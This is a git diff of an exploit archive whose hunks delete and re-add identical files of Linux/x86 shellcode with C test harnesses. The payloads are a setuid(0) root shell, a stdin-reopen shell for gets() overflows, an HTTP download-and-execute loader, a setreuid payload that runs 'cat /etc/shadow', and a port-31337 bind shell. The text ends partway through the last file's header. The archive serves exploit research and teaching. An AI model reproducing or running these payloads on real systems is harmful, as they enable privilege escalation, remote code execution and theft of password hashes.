@@ -1,44 +1,44 @@ -/* - * revenge-setuid.c, v1.0 2006/09/30 14:57 - * - * linux/x86 setuid(0) + execve("/bin//sh", ["/bin//sh"], NULL) shellcode - * once again... - * - * [ setuid (6 bytes) + execve (22 bytes) = 28 bytes ] - * [ ] - * [ Same as revenge-execve.c we start the 2 system ] - * [ calls with a mov resulting in 2 bytes less, but ] - * [ this one is only for suid binary exploitation. ] - * [ ] - * - * http://www.0xcafebabe.it - * - * - */ - -char sc[] = - // <_start> - "\xb0\x17" // mov $0x17,%al - "\x31\xdb" // xor %ebx,%ebx - "\xcd\x80" // int $0x80 - "\xb0\x0b" // mov $0xb,%al - "\x99" // cltd - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 -; - -int main() -{ - void (*fp)(void) = (void (*)(void))sc; - - printf("Length: %d\n",strlen(sc)); - fp(); -} - +/* + * revenge-setuid.c, v1.0 2006/09/30 14:57 + * + * linux/x86 setuid(0) + execve("/bin//sh", ["/bin//sh"], NULL) shellcode + * once again... + * + * [ setuid (6 bytes) + execve (22 bytes) = 28 bytes ] + * [ ] + * [ Same as revenge-execve.c we start the 2 system ] + * [ calls with a mov resulting in 2 bytes less, but ] + * [ this one is only for suid binary exploitation. ] + * [ ] + * + * http://www.0xcafebabe.it + * + * + */ + +char sc[] = + // <_start> + "\xb0\x17" // mov $0x17,%al + "\x31\xdb" // xor %ebx,%ebx + "\xcd\x80" // int $0x80 + "\xb0\x0b" // mov $0xb,%al + "\x99" // cltd + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 +; + +int main() +{ + void (*fp)(void) = (void (*)(void))sc; + + printf("Length: %d\n",strlen(sc)); + fp(); +} + // milw0rm.com [2006-11-16] \ No newline at end of file 
diff --git a/platforms/lin_x86/shellcode/13354.c b/platforms/lin_x86/shellcode/13354.c index df622b3d2..bf54d52f8 100755 --- a/platforms/lin_x86/shellcode/13354.c +++ b/platforms/lin_x86/shellcode/13354.c 
@@ -1,41 +1,41 @@ -/* - * revenge-execve.c, v1.0 2006/10/14 16:32 - * - * Yet another linux execve shellcode.. - * linux/x86 execve("/bin//sh/",["/bin//sh"],NULL) shellcode - * - * http://www.0xcafebabe.it - * - * - * But this time it's 22 bytes - * - * [ We could start the shellcode with a mov instead of (push + pop) eax ] - * [ obtaining the same result with 1 byte less, but if we had something ] - * [ wrong in eax (ex. -1 due to an unclear function exit) we can't ] - * [ inject it ] - * - * */ - -char sc[] = - // <_start> - "\xb0\x0b" // mov $0xb,%al - "\x99" // cltd - "\x52" // push %edx - "\x68\x2f\x2f\x73\x68" // push $0x68732f2f - "\x68\x2f\x62\x69\x6e" // push $0x6e69622f - "\x89\xe3" // mov %esp,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 -; - -int main() -{ - void (*fp)(void) = (void (*)(void))sc; - - printf("Length: %d\n",strlen(sc)); - fp(); -} - +/* + * revenge-execve.c, v1.0 2006/10/14 16:32 + * + * Yet another linux execve shellcode.. + * linux/x86 execve("/bin//sh/",["/bin//sh"],NULL) shellcode + * + * http://www.0xcafebabe.it + * + * + * But this time it's 22 bytes + * + * [ We could start the shellcode with a mov instead of (push + pop) eax ] + * [ obtaining the same result with 1 byte less, but if we had something ] + * [ wrong in eax (ex. -1 due to an unclear function exit) we can't ] + * [ inject it ] + * + * */ + +char sc[] = + // <_start> + "\xb0\x0b" // mov $0xb,%al + "\x99" // cltd + "\x52" // push %edx + "\x68\x2f\x2f\x73\x68" // push $0x68732f2f + "\x68\x2f\x62\x69\x6e" // push $0x6e69622f + "\x89\xe3" // mov %esp,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 +; + +int main() +{ + void (*fp)(void) = (void (*)(void))sc; + + printf("Length: %d\n",strlen(sc)); + fp(); +} + // milw0rm.com [2006-11-16] \ No newline at end of file 
diff --git a/platforms/lin_x86/shellcode/13355.c b/platforms/lin_x86/shellcode/13355.c index 2eec756a5..0bcc87648 100755 --- a/platforms/lin_x86/shellcode/13355.c +++ b/platforms/lin_x86/shellcode/13355.c 
@@ -1,128 +1,128 @@ -/* - * (linux/x86) - HTTP/1.x GET, Downloads and execve() - 111 bytes+ - * - * This shellcode allows you to download a ELF executable straight off a standard HTTP server - * and launch it. It will saved locally it into a filename called 'A' in the current directory. - * - * - * - * > The destination IP of the HTTP server is required (NO DNS!), use inet_addr() function result and - * modify the value in [1*] from 0xdeadbeef to the actual IP, if the IP contains NULLs then a little - * workaround requires. The simplest is to use ~inet_addr() followed by ``notl (%esp)`` to change back. - * - * > The destination port of the HTTP server is 80 by default, it is located within the 4 upper bytes - * of the value in [2*] (0xafff). Stored in an invert format (~), so if any further modification - * needed make sure to keep it stored in the same format. - * - * > The destination URL should be generated using the ``gen_httpreq`` utility. It will produce an - * assembly code which is a series of PUSH's and should be pasted as it is within in the marked place - * in the shellcode (look for the comment). 
- * - * : - * - * gen_httpreq.c, generates a HTTP GET request for this shellcode - * > http://www.tty64.org/code/shellcodes/utilities/gen_httpreq.c - * backup - * > http://www.milw0rm.com/shellcode/2618 - * - * - izik - */ - -char shellcode[] = - - "\x6a\x66" // push $0x66 - "\x58" // pop %eax - "\x99" // cltd - "\x6a\x01" // push $0x1 - "\x5b" // pop %ebx - "\x52" // push %edx - "\x53" // push %ebx - "\x6a\x02" // push $0x2 - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - "\x5b" // pop %ebx - "\x5e" // pop %esi - "\x68\xef\xbe\xad\xde" // [1*] push $0xdeadbeef - "\xbd\xfd\xff\xff\xaf" // [2*] mov $0xaffffffd,%ebp - "\xf7\xd5" // not %ebp - "\x55" // push %ebp - "\x43" // inc %ebx - "\x6a\x10" // push $0x10 - "\x51" // push %ecx - "\x50" // push %eax - "\xb0\x66" // mov $0x66,%al - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - "\x5f" // pop %edi - "\xb0\x08" // mov $0x8,%al - "\x52" // push %edx - "\x6a\x41" // push $0x41 - "\x89\xe3" // mov %esp,%ebx - "\x50" // push %eax - "\x59" // pop %ecx - "\xcd\x80" // int $0x80 - "\x96" // xchg %eax,%esi - "\x87\xdf" // xchg %ebx,%edi - - // - // - // - - "\xb0\x04" // mov $0x4,%al - - // - // <_send_http_request>: - // - - "\x89\xe1" // mov %esp,%ecx - "\xcd\x80" // int $0x80 - "\x99" // cltd - "\x42" // inc %edx - - // - // <_wait_for_dbl_crlf>: - // - - "\x49" // dec %ecx - "\xb0\x03" // mov $0x3,%al - "\xcd\x80" // int $0x80 - "\x81\x39\x0a\x0d\x0a\x0d" // cmpl $0xd0a0d0a,(%ecx) - "\x75\xf3" // jne <_wait_for_dbl_crlf> - "\xb2\x04" // mov $0x4,%dl - - // - // <_dump_loop_do_read>: - // - - "\xb0\x03" // mov $0x3,%al - "\xf8" // clc - - - // - // <_dump_loop_do_write>: - // - - "\xcd\x80" // int $0x80 - "\x87\xde" // xchg %ebx,%esi - "\x72\xf7" // jb <_dump_loop_do_read> - "\x85\xc0" // test %eax,%eax - "\x74\x05" // je <_close_file> - "\xb0\x04" // mov $0x4,%al - "\xf9" // stc - "\xeb\xf1" // jmp <_dump_loop_do_write> - "\xb0\x06" // mov $0x6,%al - "\xcd\x80" // int $0x80 - "\x99" // cltd - "\xb0\x0b" 
// mov $0xb,%al - "\x89\xfb" // mov %edi,%ebx - "\x52" // push %edx - "\x53" // push %ebx - "\xeb\xcc"; // jmp <_send_http_request> - -int main(int argc, char **argv) { - int *ret; - ret = (int *)&ret + 2; - (*ret) = (int) shellcode; -} - +/* + * (linux/x86) - HTTP/1.x GET, Downloads and execve() - 111 bytes+ + * + * This shellcode allows you to download a ELF executable straight off a standard HTTP server + * and launch it. It will saved locally it into a filename called 'A' in the current directory. + * + * + * + * > The destination IP of the HTTP server is required (NO DNS!), use inet_addr() function result and + * modify the value in [1*] from 0xdeadbeef to the actual IP, if the IP contains NULLs then a little + * workaround requires. The simplest is to use ~inet_addr() followed by ``notl (%esp)`` to change back. + * + * > The destination port of the HTTP server is 80 by default, it is located within the 4 upper bytes + * of the value in [2*] (0xafff). Stored in an invert format (~), so if any further modification + * needed make sure to keep it stored in the same format. + * + * > The destination URL should be generated using the ``gen_httpreq`` utility. It will produce an + * assembly code which is a series of PUSH's and should be pasted as it is within in the marked place + * in the shellcode (look for the comment). 
+ * + * : + * + * gen_httpreq.c, generates a HTTP GET request for this shellcode + * > http://www.tty64.org/code/shellcodes/utilities/gen_httpreq.c + * backup + * > http://www.milw0rm.com/shellcode/2618 + * + * - izik + */ + +char shellcode[] = + + "\x6a\x66" // push $0x66 + "\x58" // pop %eax + "\x99" // cltd + "\x6a\x01" // push $0x1 + "\x5b" // pop %ebx + "\x52" // push %edx + "\x53" // push %ebx + "\x6a\x02" // push $0x2 + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + "\x5b" // pop %ebx + "\x5e" // pop %esi + "\x68\xef\xbe\xad\xde" // [1*] push $0xdeadbeef + "\xbd\xfd\xff\xff\xaf" // [2*] mov $0xaffffffd,%ebp + "\xf7\xd5" // not %ebp + "\x55" // push %ebp + "\x43" // inc %ebx + "\x6a\x10" // push $0x10 + "\x51" // push %ecx + "\x50" // push %eax + "\xb0\x66" // mov $0x66,%al + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + "\x5f" // pop %edi + "\xb0\x08" // mov $0x8,%al + "\x52" // push %edx + "\x6a\x41" // push $0x41 + "\x89\xe3" // mov %esp,%ebx + "\x50" // push %eax + "\x59" // pop %ecx + "\xcd\x80" // int $0x80 + "\x96" // xchg %eax,%esi + "\x87\xdf" // xchg %ebx,%edi + + // + // + // + + "\xb0\x04" // mov $0x4,%al + + // + // <_send_http_request>: + // + + "\x89\xe1" // mov %esp,%ecx + "\xcd\x80" // int $0x80 + "\x99" // cltd + "\x42" // inc %edx + + // + // <_wait_for_dbl_crlf>: + // + + "\x49" // dec %ecx + "\xb0\x03" // mov $0x3,%al + "\xcd\x80" // int $0x80 + "\x81\x39\x0a\x0d\x0a\x0d" // cmpl $0xd0a0d0a,(%ecx) + "\x75\xf3" // jne <_wait_for_dbl_crlf> + "\xb2\x04" // mov $0x4,%dl + + // + // <_dump_loop_do_read>: + // + + "\xb0\x03" // mov $0x3,%al + "\xf8" // clc + + + // + // <_dump_loop_do_write>: + // + + "\xcd\x80" // int $0x80 + "\x87\xde" // xchg %ebx,%esi + "\x72\xf7" // jb <_dump_loop_do_read> + "\x85\xc0" // test %eax,%eax + "\x74\x05" // je <_close_file> + "\xb0\x04" // mov $0x4,%al + "\xf9" // stc + "\xeb\xf1" // jmp <_dump_loop_do_write> + "\xb0\x06" // mov $0x6,%al + "\xcd\x80" // int $0x80 + "\x99" // cltd + "\xb0\x0b" 
// mov $0xb,%al + "\x89\xfb" // mov %edi,%ebx + "\x52" // push %edx + "\x53" // push %ebx + "\xeb\xcc"; // jmp <_send_http_request> + +int main(int argc, char **argv) { + int *ret; + ret = (int *)&ret + 2; + (*ret) = (int) shellcode; +} + // milw0rm.com [2006-10-22] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13356.c b/platforms/lin_x86/shellcode/13356.c index 679da38a4..e0f65b454 100755 --- a/platforms/lin_x86/shellcode/13356.c +++ b/platforms/lin_x86/shellcode/13356.c 
@@ -1,52 +1,52 @@ -/* - * bunker_exec.c V1.3 - Tue Mar 21 22:50:18 CET 2006 - * - * Linux/x86 bytecode that executes command after setreuid - * (9 + 40 bytes + cmd) - * - * setreuid(0, 0) + execve("/bin//sh", ["/bin//sh","-c","cmd"], NULL); - * - * "cmd" MUST be terminated with ";" (better with ";exit;" :-D) - * - * bunker - http://rawlab.mindcreations.com - * 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2 - * - * setreuid(0, 0); - * 00000000 6a46 push byte +0x46 - * 00000002 58 pop eax - * 00000003 31db xor ebx,ebx - * 00000005 31c9 xor ecx,ecx - * 00000007 cd80 int 0x80 - * - * execve("/bin//sh", ["/bin//sh", "-c", "cmd"], NULL); - * 00000009 eb21 jmp short 0x2c - * 0000000b 5f pop edi - * 0000000c 6a0b push byte +0xb - * 0000000e 58 pop eax - * 0000000f 99 cdq - * 00000010 52 push edx - * 00000011 66682d63 push word 0x632d - * 00000015 89e6 mov esi,esp - * 00000017 52 push edx - * 00000018 682f2f7368 push dword 0x68732f2f - * 0000001d 682f62696e push dword 0x6e69622f - * 00000022 89e3 mov ebx,esp - * 00000024 52 push edx - * 00000025 57 push edi - * 00000026 56 push esi - * 00000027 53 push ebx - * 00000028 89e1 mov ecx,esp - * 0000002a cd80 int 0x80 - * 0000002c e8daffffff call 0xb - * 00000031 .... 
"cmd; exit;" - */ - -char sc[]= -"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99" -"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" -"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff" -"cat /etc/shadow; exit;"; - -main() { int(*f)()=(int(*)())sc;f(); } - +/* + * bunker_exec.c V1.3 - Tue Mar 21 22:50:18 CET 2006 + * + * Linux/x86 bytecode that executes command after setreuid + * (9 + 40 bytes + cmd) + * + * setreuid(0, 0) + execve("/bin//sh", ["/bin//sh","-c","cmd"], NULL); + * + * "cmd" MUST be terminated with ";" (better with ";exit;" :-D) + * + * bunker - http://rawlab.mindcreations.com + * 37F1 A7A1 BB94 89DB A920 3105 9F74 7349 AF4C BFA2 + * + * setreuid(0, 0); + * 00000000 6a46 push byte +0x46 + * 00000002 58 pop eax + * 00000003 31db xor ebx,ebx + * 00000005 31c9 xor ecx,ecx + * 00000007 cd80 int 0x80 + * + * execve("/bin//sh", ["/bin//sh", "-c", "cmd"], NULL); + * 00000009 eb21 jmp short 0x2c + * 0000000b 5f pop edi + * 0000000c 6a0b push byte +0xb + * 0000000e 58 pop eax + * 0000000f 99 cdq + * 00000010 52 push edx + * 00000011 66682d63 push word 0x632d + * 00000015 89e6 mov esi,esp + * 00000017 52 push edx + * 00000018 682f2f7368 push dword 0x68732f2f + * 0000001d 682f62696e push dword 0x6e69622f + * 00000022 89e3 mov ebx,esp + * 00000024 52 push edx + * 00000025 57 push edi + * 00000026 56 push esi + * 00000027 53 push ebx + * 00000028 89e1 mov ecx,esp + * 0000002a cd80 int 0x80 + * 0000002c e8daffffff call 0xb + * 00000031 .... "cmd; exit;" + */ + +char sc[]= +"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99" +"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" +"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff" +"cat /etc/shadow; exit;"; + +main() { int(*f)()=(int(*)())sc;f(); } + // milw0rm.com [2006-08-02] \ No newline at end of file 
diff --git a/platforms/lin_x86/shellcode/13357.c b/platforms/lin_x86/shellcode/13357.c index 5ce772bf7..96162cba8 100755 --- a/platforms/lin_x86/shellcode/13357.c +++ b/platforms/lin_x86/shellcode/13357.c 
@@ -1,56 +1,56 @@ -/* - * $Id: gets-linux.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ - * - * gets-linux.c - stdin re-open shellcode for Linux/x86 - * Copyright (c) 2003 Marco Ivaldi - * - * Local shellcode for stdin re-open and /bin/sh exec. It closes stdin - * descriptor and re-opens /dev/tty, then does an execve() of /bin/sh. - * Useful to exploit some gets() buffer overflows in an elegant way... - */ - -/* - * close(0) - * - * 8049380: 31 c0 xor %eax,%eax - * 8049382: 31 db xor %ebx,%ebx - * 8049384: b0 06 mov $0x6,%al - * 8049386: cd 80 int $0x80 - * - * open("/dev/tty", O_RDWR | ...) - * - * 8049388: 53 push %ebx - * 8049389: 68 2f 74 74 79 push $0x7974742f - * 804938e: 68 2f 64 65 76 push $0x7665642f - * 8049393: 89 e3 mov %esp,%ebx - * 8049395: 31 c9 xor %ecx,%ecx - * 8049397: 66 b9 12 27 mov $0x2712,%cx - * 804939b: b0 05 mov $0x5,%al - * 804939d: cd 80 int $0x80 - * - * execve("/bin/sh", ["/bin/sh"], NULL) - * - * 804939f: 31 c0 xor %eax,%eax - * 80493a1: 50 push %eax - * 80493a2: 68 2f 2f 73 68 push $0x68732f2f - * 80493a7: 68 2f 62 69 6e push $0x6e69622f - * 80493ac: 89 e3 mov %esp,%ebx - * 80493ae: 50 push %eax - * 80493af: 53 push %ebx - * 80493b0: 89 e1 mov %esp,%ecx - * 80493b2: 99 cltd - * 80493b3: b0 0b mov $0xb,%al - * 80493b5: cd 80 int $0x80 - */ - -char sc[] = -"\x31\xc0\x31\xdb\xb0\x06\xcd\x80" -"\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80" -"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; - -main() -{ - int (*f)() = (int (*)())sc; f(); -} - +/* + * $Id: gets-linux.c,v 1.3 2004/06/02 12:22:30 raptor Exp $ + * + * gets-linux.c - stdin re-open shellcode for Linux/x86 + * Copyright (c) 2003 Marco Ivaldi + * + * Local shellcode for stdin re-open and /bin/sh exec. It closes stdin + * descriptor and re-opens /dev/tty, then does an execve() of /bin/sh. + * Useful to exploit some gets() buffer overflows in an elegant way... 
+ */ + +/* + * close(0) + * + * 8049380: 31 c0 xor %eax,%eax + * 8049382: 31 db xor %ebx,%ebx + * 8049384: b0 06 mov $0x6,%al + * 8049386: cd 80 int $0x80 + * + * open("/dev/tty", O_RDWR | ...) + * + * 8049388: 53 push %ebx + * 8049389: 68 2f 74 74 79 push $0x7974742f + * 804938e: 68 2f 64 65 76 push $0x7665642f + * 8049393: 89 e3 mov %esp,%ebx + * 8049395: 31 c9 xor %ecx,%ecx + * 8049397: 66 b9 12 27 mov $0x2712,%cx + * 804939b: b0 05 mov $0x5,%al + * 804939d: cd 80 int $0x80 + * + * execve("/bin/sh", ["/bin/sh"], NULL) + * + * 804939f: 31 c0 xor %eax,%eax + * 80493a1: 50 push %eax + * 80493a2: 68 2f 2f 73 68 push $0x68732f2f + * 80493a7: 68 2f 62 69 6e push $0x6e69622f + * 80493ac: 89 e3 mov %esp,%ebx + * 80493ae: 50 push %eax + * 80493af: 53 push %ebx + * 80493b0: 89 e1 mov %esp,%ecx + * 80493b2: 99 cltd + * 80493b3: b0 0b mov $0xb,%al + * 80493b5: cd 80 int $0x80 + */ + +char sc[] = +"\x31\xc0\x31\xdb\xb0\x06\xcd\x80" +"\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80" +"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; + +main() +{ + int (*f)() = (int (*)())sc; f(); +} + // milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13358.c b/platforms/lin_x86/shellcode/13358.c index 022fa217b..8d49daa2b 100755 --- a/platforms/lin_x86/shellcode/13358.c +++ b/platforms/lin_x86/shellcode/13358.c 
@@ -1,33 +1,33 @@ -/* - * $Id: reusage-linux.c,v 1.3 2004/01/30 20:08:46 raptor Exp $ - * - * reusage-linux.c - re-use of "/bin/sh" string in .rodata - * Copyright (c) 2003 Marco Ivaldi - * - * Short local shellcode for /bin/sh execve(). It re-uses the "/bin/sh" - * string stored in the .rodata section of the vulnerable program. Change - * the string address as needed (based on zillion's original idea). - */ - -/* - * execve("/bin/sh", ["/bin/sh"], NULL) - * - * 8049368: 31 c0 xor %eax,%eax - * 804936a: bb 08 84 04 08 mov $0x8048408,%ebx # change it - * 804936f: 53 push %ebx - * 8049370: 89 e1 mov %esp,%ecx - * 8049372: 31 d2 xor %edx,%edx - * 8049374: b0 0b mov $0xb,%al - * 8049376: cd 80 int $0x80 - * 8049378: 00 00 add %al,(%eax) - */ - -char sc[] = /* 16 bytes */ -"\x31\xc0\xbb\x08\x84\x04\x08\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"; - -main() -{ - int (*f)() = (int (*)())sc; f(); -} - +/* + * $Id: reusage-linux.c,v 1.3 2004/01/30 20:08:46 raptor Exp $ + * + * reusage-linux.c - re-use of "/bin/sh" string in .rodata + * Copyright (c) 2003 Marco Ivaldi + * + * Short local shellcode for /bin/sh execve(). It re-uses the "/bin/sh" + * string stored in the .rodata section of the vulnerable program. Change + * the string address as needed (based on zillion's original idea). + */ + +/* + * execve("/bin/sh", ["/bin/sh"], NULL) + * + * 8049368: 31 c0 xor %eax,%eax + * 804936a: bb 08 84 04 08 mov $0x8048408,%ebx # change it + * 804936f: 53 push %ebx + * 8049370: 89 e1 mov %esp,%ecx + * 8049372: 31 d2 xor %edx,%edx + * 8049374: b0 0b mov $0xb,%al + * 8049376: cd 80 int $0x80 + * 8049378: 00 00 add %al,(%eax) + */ + +char sc[] = /* 16 bytes */ +"\x31\xc0\xbb\x08\x84\x04\x08\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"; + +main() +{ + int (*f)() = (int (*)())sc; f(); +} + // milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13359.c b/platforms/lin_x86/shellcode/13359.c index e096a58d1..8b9dae5ee 100755 
--- a/platforms/lin_x86/shellcode/13359.c +++ b/platforms/lin_x86/shellcode/13359.c 
@@ -1,42 +1,42 @@ -/* - * $Id: setuid-linux.c,v 1.4 2004/06/02 12:22:30 raptor Exp $ - * - * setuid-linux.c - setuid/execve shellcode for Linux/x86 - * Copyright (c) 2004 Marco Ivaldi - * - * Short fully-functional setuid(0) and /bin/sh execve() shellcode. - */ - -/* - * setuid(0) - * - * 8049380: 6a 17 push $0x17 - * 8049382: 58 pop %eax - * 8049383: 31 db xor %ebx,%ebx - * 8049385: cd 80 int $0x80 - * - * execve("/bin//sh", ["/bin//sh"], NULL) - * - * 8049387: 6a 0b push $0xb - * 8049389: 58 pop %eax - * 804938a: 99 cltd - * 804938b: 52 push %edx - * 804938c: 68 2f 2f 73 68 push $0x68732f2f - * 8049391: 68 2f 62 69 6e push $0x6e69622f - * 8049396: 89 e3 mov %esp,%ebx - * 8049398: 52 push %edx - * 8049399: 53 push %ebx - * 804939a: 89 e1 mov %esp,%ecx - * 804939c: cd 80 int $0x80 - */ - -char sc[] = /* 7 + 23 = 30 bytes */ -"\x6a\x17\x58\x31\xdb\xcd\x80" -"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"; - -main() -{ - int (*f)() = (int (*)())sc; f(); -} - +/* + * $Id: setuid-linux.c,v 1.4 2004/06/02 12:22:30 raptor Exp $ + * + * setuid-linux.c - setuid/execve shellcode for Linux/x86 + * Copyright (c) 2004 Marco Ivaldi + * + * Short fully-functional setuid(0) and /bin/sh execve() shellcode. 
+ */ + +/* + * setuid(0) + * + * 8049380: 6a 17 push $0x17 + * 8049382: 58 pop %eax + * 8049383: 31 db xor %ebx,%ebx + * 8049385: cd 80 int $0x80 + * + * execve("/bin//sh", ["/bin//sh"], NULL) + * + * 8049387: 6a 0b push $0xb + * 8049389: 58 pop %eax + * 804938a: 99 cltd + * 804938b: 52 push %edx + * 804938c: 68 2f 2f 73 68 push $0x68732f2f + * 8049391: 68 2f 62 69 6e push $0x6e69622f + * 8049396: 89 e3 mov %esp,%ebx + * 8049398: 52 push %edx + * 8049399: 53 push %ebx + * 804939a: 89 e1 mov %esp,%ecx + * 804939c: cd 80 int $0x80 + */ + +char sc[] = /* 7 + 23 = 30 bytes */ +"\x6a\x17\x58\x31\xdb\xcd\x80" +"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80"; + +main() +{ + int (*f)() = (int (*)())sc; f(); +} + // milw0rm.com [2006-07-20] \ No newline at end of file diff --git a/platforms/lin_x86/shellcode/13360.c b/platforms/lin_x86/shellcode/13360.c index 35bd8d594..ec5b77b1d 100755 --- a/platforms/lin_x86/shellcode/13360.c +++ b/platforms/lin_x86/shellcode/13360.c 
@@ -1,109 +1,109 @@ -/* - * $Id: portbind-linux.c,v 1.4 2004/06/02 12:22:30 raptor Exp $ - * - * portbind-linux.c - setuid/portbind shellcode for Linux/x86 - * Copyright (c) 2003 Marco Ivaldi - * - * Simple portbind shellcode that bind()'s a setuid(0) shell on - * port 31337/tcp (based on bighawk's code). - * - * Tested on Linux. - */ - -/* - * setuid(0) - * - * 8049380: 31 c0 xor %eax,%eax - * 8049382: 31 db xor %ebx,%ebx - * 8049384: b0 17 mov $0x17,%al - * 8049386: cd 80 int $0x80 - * - * socket(AF_INET, SOCK_STREAM, 0) - * - * 8049388: 31 db xor %ebx,%ebx - * 804938a: f7 e3 mul %ebx - * 804938c: b0 66 mov $0x66,%al - * 804938e: 53 push %ebx - * 804938f: 43 inc %ebx - * 8049390: 53 push %ebx - * 8049391: 43 inc %ebx - * 8049392: 53 push %ebx - * 8049393: 89 e1 mov %esp,%ecx - * 8049395: 4b dec %ebx - * 8049396: cd 80 int $0x80 - * - * bind(s, server, sizeof(server)) - * - * 8049398: 89 c7 mov %eax,%edi - * 804939a: 52 push %edx - * 804939b: 66 68 7a 69 pushw $0x697a - * 804939f: 43 inc %ebx - * 80493a0: 66 53 push %bx - * 80493a2: 89 e1 mov %esp,%ecx - * 80493a4: b0 10 mov $0x10,%al - * 80493a6: 50 push %eax - * 80493a7: 51 push %ecx - * 80493a8: 57 push %edi - * 80493a9: 89 e1 mov %esp,%ecx - * 80493ab: b0 66 mov $0x66,%al - * 80493ad: cd 80 int $0x80 - * - * listen(s, 1) - * - * 80493af: b0 66 mov $0x66,%al - * 80493b1: b3 04 mov $0x4,%bl - * 80493b3: cd 80 int $0x80 - * - * accept(s, 0, 0) - * - * 80493b5: 50 push %eax - * 80493b6: 50 push %eax - * 80493b7: 57 push %edi - * 80493b8: 89 e1 mov %esp,%ecx - * 80493ba: 43 inc %ebx - * 80493bb: b0 66 mov $0x66,%al - * 80493bd: cd 80 int $0x80 - * - * dup2(c, 2) - * dup2(c, 1) - * dup2(c, 0) - * - * 80493bf: 89 d9 mov %ebx,%ecx - * 80493c1: 89 c3 mov %eax,%ebx - * 80493c3: b0 3f mov $0x3f,%al - * 80493c5: 49 dec %ecx - * 80493c6: cd 80 int $0x80 - * 80493c8: 41 inc %ecx - * 80493c9: e2 f8 loop 80493c3 - * - * execve("/bin/sh", ["/bin/sh"], NULL) - * - * 80493cb: 51 push %ecx - * 80493cc: 68 6e 2f 73 68 push 
$0x68732f6e - * 80493d1: 68 2f 2f 62 69 push $0x69622f2f - * 80493d6: 89 e3 mov %esp,%ebx - * 80493d8: 51 push %ecx - * 80493d9: 53 push %ebx - * 80493da: 89 e1 mov %esp,%ecx - * 80493dc: b0 0b mov $0xb,%al - * 80493de: cd 80 int $0x80 - * 80493e0: 00 00 add %al,(%eax) - */ - -char sc[] = /* 8 + 88 = 96 bytes */ -"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" -"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80" -"\x89\xc7\x52\x66\x68" -"\x7a\x69" // port 31337/tcp, change if needed -"\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80" -"\xb0\x66\xb3\x04\xcd\x80" -"\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80" -"\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80" -"\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80"; - -main() -{ - int (*f)() = (int (*)())sc; f(); -} - +/* + * $Id: portbind-linux.c,v 1.4 2004/06/02 12:22:30 raptor Exp $ + * + * portbind-linux.c - setuid/portbind shellcode for Linux/x86 + * Copyright (c) 2003 Marco Ivaldi + * + * Simple portbind shellcode that bind()'s a setuid(0) shell on + * port 31337/tcp (based on bighawk's code). + * + * Tested on Linux. 
